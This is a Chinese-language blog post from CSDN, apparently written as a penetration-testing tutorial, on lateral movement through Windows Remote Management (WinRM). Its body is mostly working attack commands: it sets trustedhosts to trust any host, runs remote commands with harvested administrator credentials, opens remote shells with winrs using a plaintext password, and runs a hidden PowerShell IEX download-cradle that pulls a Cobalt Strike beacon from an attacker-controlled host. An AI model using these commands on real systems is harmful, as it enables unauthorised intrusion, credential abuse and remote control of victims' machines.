winRM横向移动

已于 2024-01-11 16:34:00 修改
阅读量2k 收藏 9
点赞数 1
分类专栏: 内网渗透 文章标签: winRM 横向移动 Windows
于 2020-02-15 20:07:18 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/104333583
版权

在这里插入图片描述

0x01 winRM简介

WinRM 是 Microsoft 对 WS-Management 协议的实现,WS-Management 协议即一种基于标准简单对象访问协议[SOAP]的 “防火墙友好” 协议,它让来自不同供应商的硬件和操作系统能够互相操作。winRM的默认端口为5985(http)或5986(https)。
winRM横向移动同时适用于工作组和域环境

0x02 利用条件

1、在win 2012之后(包括win 2012)的版本是默认开启的,win 2012之前利用需要手动开启winRM。
2、防火墙对5986、5985端口开放。

0x03 通过winRM横向移动

一、查看本地和目标是否开放winRM服务

1、查看本地是否运行winRM服务。

netstat -ano |findstr 5985
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

在这里插入图片描述

2、查看目标是否运行winRM服务。

nmap -sV 192.168.3.73 -p5985,5986

在这里插入图片描述
3、查看目标机器的winRM服务是否工作正常,如图所示为正常。

powershell -exec bypass
Test-WsMan 192.168.3.73

在这里插入图片描述

二、通过winRM在目标主机上执行任意命令

命令执行
1、在第一次执行命令的时候,可能会报下列错误。
在这里插入图片描述
这时我们执行下列两条命令,将当前主机的trustedhosts设置为*,表示信任任意主机,之后重启winRM。

Set-Item WSMan:localhost\client\trustedhosts -value *
Restart-Service WinRM

在这里插入图片描述

2、设置完成后执行下列命令,输入之前收集到的密码。

Invoke-Command -ComputerName 192.168.3.73 -ScriptBlock { ipconfig } -credential administrator

在这里插入图片描述
命令执行成功。
在这里插入图片描述

3、直接执行cs payload,弹回一个cs beacon。

Invoke-Command -ComputerName 192.168.3.73 -ScriptBlock { powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.3.86:80/a'))" } -credential administrator

在这里插入图片描述
cs成功接收到会话。
在这里插入图片描述

反弹shell
1、通过Enter-PSSession直接弹回一个cmd shell。

Enter-PSSession -ComputerName 192.168.3.73 -Credential administrator

在这里插入图片描述
反弹shell成功。
在这里插入图片描述

三、Windows内置工具winrs的使用

命令执行

winrs -r:192.168.3.73 -u:administrator -p:Admin!@#45 "ipconfig"

在这里插入图片描述

反弹shell

winrs -r:192.168.3.73 -u:administrator -p:Admin!@#45 "cmd"

在这里插入图片描述

LQxdp
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
内网渗透(四十五)之横向移动篇-WinRM远程执行命令横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-21 411
WinRMWindows远程管理)是Microsoft 在Windows中对WS-Management的实现,它使系统可以跨通用网络访问或交换管理信息。利用脚本对象或内置的命令行工具,WinRM可以与可能具有基板管理控制器(BMC)的任何远程计算机一起使用,以获取数据。也可以获取基于Windows的计算机(包括WinRM)。WinRM默认端口5985(HTTP端口)或5986(HTTPS端口),若配置了WINRM远程服务,当我们拿到一个管理员账户时,可以使用远程连接进行命令执行操作。
Go-winrm-cli-一个命令行工具通过WinRMWindows机器上远程执行命令
08-13
winrm-cli - 一个命令行工具通过WinRMWindows机器上远程执行命令
内网安全:RDP WinRS WinRM SPN Kerberos 横向移动
qq_61553520的博客
01-28 1477
​​​​​​​。
windows WinRM服务的安全描述符定义语言(SDDL)讲解_安全描述符定义语言(sddl)
最新发布
2401_84264536的博客
06-25 354
WinRMWindows Remote Management)是基于WS-Management协议的Windows服务,允许远程管理。这种管理包括运行命令、获取系统信息等,主要用于远程操作和服务器管理。
WinRM横向移动
Ping_Pig的博客
10-22 843
https://blog.csdn.net/SheXinK/article/details/103754294
横向移动-WINRM
whojoe的博客
05-19 357
横向移动-WINRMWINRM前提远程管理1.winrs2.powershell端口复用参考文章 WINRM WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。通过HTTP(5985)或HTTPS SOAP(5986)执行通信,默认情况下支持Kerberos和NTLM身份验证以及基本身份验证。使用此服务需要管理员级别凭据。 前提 双方都要开启winRM,并且可以通信 Windows 2008 以上版本默认自动状态,Windows Vista/win7上必须手动启动;WinRS
横向移动WinRM
2301_80127209的博客
04-19 622
同学们可能没有听说过WinRM横向移动技术,今天我给大家分析讲解一波儿看不懂也没关系,先看看有个大概的概念,以后慢慢就懂了。
WinRM横向移动详解
weixin_43873557的博客
02-23 318
https://mp.weixin.qq.com/s/Y9rGmAnFivcTofOVt0BUmQ
winrm
03-13
1. **启用WinRM服务**:在命令提示符下运行`winrm quickconfig`,可以快速启动并配置WinRM服务。 2. **创建监听器**:使用`winrm create winrm/config/Listener?Address=*+Transport=HTTP`或`Transport=HTTPS`创建...
pywinrmWindows远程管理(WinRM)的Python库
02-28
pywinrm pywinrmWindows远程管理(WinRM)服务的Python客户端。 它允许您从任何可以运行Python的计算机上在目标Windows计算机上调用命令。 WinRM允许您远程执行各种管理任务。 这些包括但不限于:运行批处理脚本,...
modernie-winrm:此Vagrantfile能够在Microsoft分发的盒子上自动配置WinRM
02-06
现代主义这个Vagrantfile能够在分发的机器上自动配置WinRM。 换句话说,这个Vagrantfile能够: 禁用防火墙(Microsoft分发的框默认配置为启用防火墙); 将网络位置类型更改为“工作网络”(默认情况下,Microsoft...
Go-winrm-一个GoWinRM客户端用于在Windows机器上执行远程命令
08-13
winrm - 一个 Go WinRM 客户端用于在Windows机器上执行远程命令
命令行工具,用于通过WinRMWindows计算机上远程执行命令-Golang开发
05-26
winrm-cli这是一个Go命令行可执行文件,可通过使用WinRM / WinRS在Windows机器上执行远程命令。 注意:此工具不支持域用户(它不支持GSSAPI或Kerberos)。 它是主要的winrm-cli这是一个Go命令行可执行文件,可通过使用WinRM / WinRS在Windows计算机上执行远程命令。 注意:此工具不支持域用户(它不支持GSSAPI或Kerberos)。 它的主要目标是在EC2 Windows计算机上执行远程命令。 联系Bug:https://github.com/masterzen/winrm/issues入门WinRMWindows Server 2008及更高版本上可用。 该项目本机支持本地帐户的基本身份验证,请参阅st
winrm:用于配置WinRM的PowerShell脚本(允许Ansible与Win主机进行远程通信)
05-15
运行PowerShell脚本 有几种方法可以运行PowerShell脚本。 在新的PowerShell安装上运行任何脚本之前,必须首先设置适当的执行策略,例如Set-ExecutionPolicy RemoteSigned PowerShell脚本等效于Windows CMD或MS-DOS批处理文件,该文件应以.ps1扩展名保存,例如MyScript.ps1 运行脚本的最常见(默认)方法是调用它: PS C:>&“ C:\ Belfry \ My first Script.ps1” 如果路径不包含任何空格,则可以省略引号和'&'运算符 PS C:> C:\ Belfry \ Myscript.ps1 如果脚本在当前目录中,则必须使用。\来指示(或者也可以使用./) PS C:>。\ Myscript.ps1 以提升的权限运行 必须从提升的提示符下运行某些PowerShell
WinRM-Scripts:WinRM脚本
04-02
WinRMWindows Remote Management)是微软提供的一种标准的管理协议,用于远程管理和监控Windows系统。它基于WS-Man(Web Services for Management)规范,允许管理员通过HTTP或HTTPS协议执行各种管理任务,如运行...
winrm.cmd
12-14
winrm
横向传递之WimRM
01-12 1459
简介 Windows 远程管理 (WinRM) 是 WS-Management协议(很多文章写做WSMAN)的 Microsoft 实现。该协议是基于简单对象访问协议 (SOAP) 的、防火墙友好的标准协议,使来自不同供应商的硬件和操作系统能够互操作。 此WS-Management协议规范为系统提供了一种跨 IT 基础结构访问和交换管理信息的常用方法。 WinRM 和智能平台管理 接口 (IPMI) ,以及事件收集器是 Windows 硬件管理功能的组件。 WinRM早期版本监听的是80和443端口,win
内网渗透测试:利用 WinRM 进行横向渗透
wangluoanquan111的博客
08-22 269
WinRM 作为 Windows 操作系统的一部分,是一项允许管理员在系统上远程执行管理任务的服务。这样的服务当然不会被攻击者错过,本篇文章我们就来讲讲WinRM横向渗透中的使用。文中若有不当之处,还请各位大佬师傅们多多点评。WinRMWindows Remote Managementd(Windows 远程管理)的简称,是 Web 服务管理标准 WebService-Management 协议的 Microsoft实现。
windows内置工具横向移动
weixin_43873557的博客
02-10 494
01. IPC+Schtasks IPC$ (Internet Process Connection) 是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 利用条件 开放了139、445端口; 目标开启IPC$文件共享服务 需要目标机器的管理员账号和密码 连接 net use \10.10.10.201\ipc$ /user:administrator “1qaz@
winrm 拒绝访问
10-09
WinRMWindows 远程管理)是一种用于远程管理 Windows 操作系统的协议和技术。当在尝试远程访问时,可能会遇到“WinRM 拒绝访问”的错误。 这个错误通常是由于以下原因之一导致的: 1. 防火墙设置: 防火墙可能会...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值